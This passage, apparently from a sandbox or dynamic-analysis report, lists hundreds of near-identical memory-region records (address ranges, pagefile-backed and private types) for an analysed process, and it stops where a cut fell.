start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9848 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9849 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9850 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9851 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9852 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9853 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9960 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 9961 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 9962 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 9963 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 9964 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9965 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: 
id = 9966 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9967 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9968 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9969 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9970 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9971 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9972 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9973 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9974 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9975 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9976 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9977 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9978 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" 
filename = "" Region: id = 9979 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9980 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9982 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9983 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9984 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9985 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9986 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9987 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9988 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9989 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9990 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9991 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 9997 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9998 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 9999 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10000 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10001 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10002 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10003 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10004 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10005 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10006 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10007 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10008 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10009 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type 
= pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10010 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10011 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10012 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10013 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10014 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10015 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10016 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10017 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10018 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10019 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10020 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10021 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10022 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10023 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10024 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10030 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10031 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10032 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10033 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10034 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10035 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10036 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10037 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10038 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10039 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10040 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10041 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10042 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10043 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10044 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10045 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10046 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10047 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10048 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10049 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10050 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10051 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10052 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 10053 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10054 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10055 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10056 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10057 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10058 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10059 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10060 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10061 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10062 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10063 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10064 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10065 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002a0000" filename = "" Region: id = 10066 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10067 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10068 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10069 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10070 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10071 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10072 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10073 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10074 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10075 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10175 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10176 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001800000" filename = "" Region: id = 10177 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10178 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10179 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10180 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10181 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10182 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10183 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10184 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10185 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10186 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10187 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10188 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10189 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10190 start_va = 0x2a0000 end_va = 0x2b0fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10191 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10192 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10193 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10194 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10195 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10196 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10197 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10198 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10199 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10200 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10201 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10202 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10203 start_va 
= 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10204 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10205 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10206 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10207 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10208 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10209 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10210 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10211 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10217 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10218 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10219 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10220 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" 
Region: id = 10221 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10222 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10223 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10224 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10225 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10226 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10227 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10228 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10229 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10230 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10231 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10232 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10233 start_va = 0x1800000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001800000" filename = "" Region: id = 10234 start_va = 0x1c10000 end_va = 0x201ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c10000" filename = "" Region: id = 10235 start_va = 0x2b0000 end_va = 0x2c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 10236 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10237 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10238 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10239 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10240 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10241 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10242 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10243 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10244 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10245 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10246 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10247 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10248 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10249 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10250 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10251 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10252 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10253 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10254 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10255 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10256 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10257 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10258 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 10264 start_va = 0x2a0000 end_va 
